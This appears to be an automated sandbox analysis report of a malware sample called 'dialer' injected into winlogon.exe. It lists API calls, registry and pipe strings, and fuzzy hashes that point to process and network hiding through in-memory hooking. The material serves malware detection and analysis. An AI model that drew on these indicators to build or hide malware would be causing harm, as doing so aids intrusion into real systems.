Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction ID: 23daddaa9d40103eff251a7bedf7b140a4808238d2d9615461c0489ff87134be
Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction Fuzzy Hash: 15D0C994B1660792EE299F6A686403453916F58B85F8C54B2CE9EE6350DE3CD0998708

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: winlogon.exePID: 552, Parent PID: 6832COMMON

Executed Functions

Function 00000225DC641628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC641633
HeapAlloc.KERNEL32 ref: 00000225DC641642

Part of subcall function 00000225DC641268: GetProcessHeap.KERNEL32 ref: 00000225DC64126E
Part of subcall function 00000225DC641268: HeapAlloc.KERNEL32 ref: 00000225DC64127D
Part of subcall function 00000225DC641268: GetProcessHeap.KERNEL32 ref: 00000225DC641297
Part of subcall function 00000225DC641268: HeapAlloc.KERNEL32 ref: 00000225DC6412A8

RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416B2
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DF
RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
RegOpenKeyExW.ADVAPI32 ref: 00000225DC641719
RegCloseKey.ADVAPI32 ref: 00000225DC641734
RegOpenKeyExW.ADVAPI32 ref: 00000225DC641754
RegCloseKey.ADVAPI32 ref: 00000225DC64176F
RegOpenKeyExW.ADVAPI32 ref: 00000225DC64178F
RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417CA
RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
RegOpenKeyExW.ADVAPI32 ref: 00000225DC641805
RegCloseKey.ADVAPI32 ref: 00000225DC641820
RegOpenKeyExW.ADVAPI32 ref: 00000225DC641840
RegCloseKey.ADVAPI32 ref: 00000225DC64185B
RegOpenKeyExW.ADVAPI32 ref: 00000225DC64187B
RegCloseKey.ADVAPI32 ref: 00000225DC641896
RegCloseKey.ADVAPI32 ref: 00000225DC6418A0

Part of subcall function 00000225DC6412BC: RegQueryInfoKeyW.ADVAPI32 ref: 00000225DC641319
Part of subcall function 00000225DC6412BC: GetProcessHeap.KERNEL32 ref: 00000225DC641327
Part of subcall function 00000225DC6412BC: HeapAlloc.KERNEL32 ref: 00000225DC641338
Part of subcall function 00000225DC6412BC: RegEnumValueW.ADVAPI32 ref: 00000225DC641397
Part of subcall function 00000225DC6412BC: GetProcessHeap.KERNEL32 ref: 00000225DC6413DF
Part of subcall function 00000225DC6412BC: HeapAlloc.KERNEL32 ref: 00000225DC6413ED
Part of subcall function 00000225DC6412BC: GetProcessHeap.KERNEL32 ref: 00000225DC64140A
Part of subcall function 00000225DC6412BC: HeapFree.KERNEL32 ref: 00000225DC641418
Part of subcall function 00000225DC6412BC: lstrlenW.KERNEL32 ref: 00000225DC641421
Part of subcall function 00000225DC6412BC: GetProcessHeap.KERNEL32 ref: 00000225DC64142F
Part of subcall function 00000225DC6412BC: HeapAlloc.KERNEL32 ref: 00000225DC64143D

Strings

udp, xrefs: 00000225DC641874
startup, xrefs: 00000225DC6416D5
tcp_local, xrefs: 00000225DC6417FE
tcp_remote, xrefs: 00000225DC641839
service_names, xrefs: 00000225DC6417C3
process_names, xrefs: 00000225DC64174D
SOFTWARE\dialerconfig, xrefs: 00000225DC641692
pid, xrefs: 00000225DC641712
paths, xrefs: 00000225DC641788

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 406a7c028b3c229bdc1c75f8301e19e1701b13e4dfdd540bc7c265abecc9bc67
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: 47712D7E328E60A6EB109FA9E85869D33B4F784F9AF509111DE4E47B69EF34C444C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC643790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00000225DC64379E
GetCurrentProcess.KERNEL32 ref: 00000225DC6437CC
VirtualProtectEx.KERNEL32 ref: 00000225DC6437EE
GetCurrentProcess.KERNEL32 ref: 00000225DC643809
VirtualProtectEx.KERNEL32 ref: 00000225DC64382A

Strings

wr, xrefs: 00000225DC6437FF

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 5b5ece5b16f05410ef88fc7334ca4b30fcb2165cfe8f9a178b0778bd0effcbe9
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 96118B2A318F5493EF549BA9E408269B2A0FB88F86F148038DF8A03B94EF3DC505C704

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC645B30 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00000225DC645B6B
GetThreadContext.KERNEL32 ref: 00000225DC645CD5

Part of subcall function 00000225DC645960: GetCurrentThreadId.KERNEL32 ref: 00000225DC645964

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
Instruction ID: f245da02ec037058e9828f5728e6f8f7909b60f63258dcba4de34453af5a61e8
Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
Instruction Fuzzy Hash: B9D1997A20CF9896DA70DB4AE49835A7BA0F7C8B85F104156EACE47BA5DF3CC541CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC6450D0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00000225DC645156

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
Instruction ID: ca8f9a462bd9996edb27ee4ecd3a9b3d43bbe2f9124c1ca87dd336038b8394af
Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
Instruction Fuzzy Hash: 1102C83661DF9496EB60CB99E49436AB7A1F3C4795F104056EA8E87BA8DF7CC444CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC6439E0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00000225DC643A66
VirtualAlloc.KERNEL32 ref: 00000225DC643AA0

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction ID: 3d7c28a49f1379a387e1eab8d3c47744672dc9424a01523034e22865a73a9f88
Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction Fuzzy Hash: 7F31302625DE98A1EA30DB9DE05835E76A1F388B85F108575F6CF46BA8DF7CC180CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC64328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000225DC6432AE
PathFindFileNameW.SHLWAPI ref: 00000225DC6432BD

Part of subcall function 00000225DC643844: StrCmpNIW.SHLWAPI ref: 00000225DC64385C

Part of subcall function 00000225DC643790: GetModuleHandleW.KERNEL32 ref: 00000225DC64379E
Part of subcall function 00000225DC643790: GetCurrentProcess.KERNEL32 ref: 00000225DC6437CC
Part of subcall function 00000225DC643790: VirtualProtectEx.KERNEL32 ref: 00000225DC6437EE
Part of subcall function 00000225DC643790: GetCurrentProcess.KERNEL32 ref: 00000225DC643809
Part of subcall function 00000225DC643790: VirtualProtectEx.KERNEL32 ref: 00000225DC64382A

CreateThread.KERNEL32 ref: 00000225DC64330B

Part of subcall function 00000225DC641D14: GetCurrentThread.KERNEL32 ref: 00000225DC641D1F

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: 7d3d60018f90cf45d3bc6b126cf75a44508ad4678cf0a9f52ef5460c3c2565a3
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 7011C07C62CEA8B2FB619BE8F90C3993295AB54B47F50C1B4EB0781690EF78C044C240

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC644DF0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00000225DC644DF4
VirtualProtect.KERNEL32 ref: 00000225DC644E37
FlushInstructionCache.KERNEL32 ref: 00000225DC644E4C

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
Instruction ID: 7e590623df8fc7209075b22fdaf8685971673eb90f371bc8902be2096d1f9670
Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
Instruction Fuzzy Hash: 9FF03A2A21CF24D0D630DB89E44976ABBA0F788BD5F148151FA8E43B69CE3CC681CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC61273C Relevance: 3.2, APIs: 2, Instructions: 187
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000225DC6127DB
LoadLibraryA.KERNELBASE ref: 00000225DC61285E

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: b5a9ffdff3e85ff3f1f12f145a610503c53f3502f35e5ceb3ac916478b11310c
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: D261363AB02AA097DF56CF5ED00876DB392F754BA6F18C521CE5907788DA38D852C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC641ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416B2
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DF
Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641719
Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641734
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641754
Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64178F
Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417CA

Sleep.KERNEL32 ref: 00000225DC641AD7
SleepEx.KERNEL32 ref: 00000225DC641ADD

Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641805
Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641840
Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64187B
Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6418A0

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: b89290e72799dd3975187c06206b195ef9f7eec7f326f7ac498d84b976088364
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: 0731356921CE61B2FF509BAED6593A933A4AB54BC6F04D4A19E0F873E5FF30C451C210

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC67273C Relevance: 1.4, APIs: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000225DC6727DB

Memory Dump Source

Source File: 00000016.00000002.2891941444.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc670000_winlogon.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: c822286e1b467df8a310eb99b0d592360f537eec13a50740bd2f5dfddf19021e
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: A561483AB01AA0D7DB56CF9AD00876DB3A2F754BA5F18C921CF5907BC8DA38D852C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC6AD6CC Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 00000225DC6AD721

Memory Dump Source

Source File: 00000016.00000002.2892199360.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
Instruction ID: d48ce241fd5c6b57c9d66a3839ec59588558f897ab86195e616c0656e38ee758
Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
Instruction Fuzzy Hash: 21F05E6C301E2161FE6DDBEE995D3A552955F89B82F6CE4344D0AC67E2EE3CC481C620

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00000225DC647D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000225DC647DAC
RtlCaptureContext.NTDLL ref: 00000225DC647DD9
RtlLookupFunctionEntry.NTDLL ref: 00000225DC647DF3
RtlVirtualUnwind.NTDLL ref: 00000225DC647E34
IsDebuggerPresent.KERNEL32 ref: 00000225DC647E88
SetUnhandledExceptionFilter.KERNEL32 ref: 00000225DC647EA9
UnhandledExceptionFilter.KERNEL32 ref: 00000225DC647EB4

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: a0dd4a3191c2f22ec65cd5f9c7d8c34c65d38d6a3a9ca6151c6be4ce44add157
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 29318376219F909AEB609FA4E8447ED73A0F784745F44812ADB4E57B94EF38C548CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC616910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000225DC616938
__scrt_acquire_startup_lock.LIBCMT ref: 00000225DC61698A
_RTC_Initialize.LIBCMT ref: 00000225DC6169B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000225DC6169DE
__scrt_release_startup_lock.LIBCMT ref: 00000225DC616A09

Strings

`eh vector vbase copy constructor iterator', xrefs: 00000225DC6169EE
`eh vector copy constructor iterator', xrefs: 00000225DC616A3B
scriptor', xrefs: 00000225DC616B39, 00000225DC616BB2, 00000225DC616BEC
`dynamic initializer for ', xrefs: 00000225DC6169C7

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 7539ecd07ed9e19813cea4b70ed8e4e8e5b401edcb5cd18e99020899339b4ff2
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: DF81122D702E71A6FE60EBED944D35962E0EB95783F18C425AB4983797EF38C946C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC64CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000225DC64CE37
FlsGetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE4C
FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE6D
FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE9A
FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEAB
FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEBC
SetLastError.KERNEL32 ref: 00000225DC64CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF0D
FlsSetValue.KERNEL32(?,?,00000001,00000225DC64ECCC,?,?,?,?,00000225DC64BF9F,?,?,?,?,?,00000225DC647AB0), ref: 00000225DC64CF2C

Part of subcall function 00000225DC64D6CC: HeapAlloc.KERNEL32 ref: 00000225DC64D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF54

Part of subcall function 00000225DC64D744: HeapFree.KERNEL32 ref: 00000225DC64D75A
Part of subcall function 00000225DC64D744: GetLastError.KERNEL32 ref: 00000225DC64D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF76

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: c96d39c070731bccc58dc25472949b9c8324ede58aceb138708ddbc32eb2cb43
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: 3B41AB2C34CE64B6FE68A7FD955D36932825F857B2F24C7A4A937467E6DF388442C200

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC642244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000225DC642259
GetCurrentProcessId.KERNEL32 ref: 00000225DC642263

Part of subcall function 00000225DC641934: OpenProcess.KERNEL32 ref: 00000225DC641952
Part of subcall function 00000225DC641934: IsWow64Process.KERNEL32 ref: 00000225DC641968
Part of subcall function 00000225DC641934: CloseHandle.KERNEL32 ref: 00000225DC641983

CreateFileW.KERNEL32 ref: 00000225DC6422BC
WriteFile.KERNEL32 ref: 00000225DC6422E4
ReadFile.KERNEL32 ref: 00000225DC642303
CloseHandle.KERNEL32 ref: 00000225DC64230C

Strings

\\.\pipe\dialerchildproc64, xrefs: 00000225DC64228C
\\.\pipe\dialerchildproc32, xrefs: 00000225DC642293

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 1de5ddcc8f1dfc1167620b25f9dc58926eb66b08d3309719a253bb24b32ba1e0
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: 8E215679628F5093F710CBA9F54835977A1F785796F608215DB5903BA4CF7CC145CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC619944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000225DC6199A1

Part of subcall function 00000225DC61A814: __GetUnwindTryBlock.LIBCMT ref: 00000225DC61A857
Part of subcall function 00000225DC61A814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000225DC61A87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000225DC619A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000225DC619CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 00000225DC619DDA

Strings

csm, xrefs: 00000225DC619A22
csm, xrefs: 00000225DC619A9C
csm, xrefs: 00000225DC6199BB

Memory Dump Source

Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: ccd8efdbd64409059a3f17658d38d7afc50ea8cd74631e28eb6d2bb9e49f1cd4
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: F3E1D37A602F609AEF60DFA9D48839D77E0F749B8BF108115EE8947B99CB34C592C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000225DC649DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000225DC649E49
GetLastError.KERNEL32 ref: 00000225DC649E57
LoadLibraryExW.KERNEL32 ref: 00000225DC649E81
FreeLibrary.KERNEL32 ref: 00000225DC649EC7
GetProcAddress.KERNEL32 ref: 00000225DC649ED3

Strings

api-ms-, xrefs: 00000225DC649E69

Memory Dump Source

Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 1846bb63d11909a53191b25e77548844483a8de6adc9bd3f24389271b0a95010
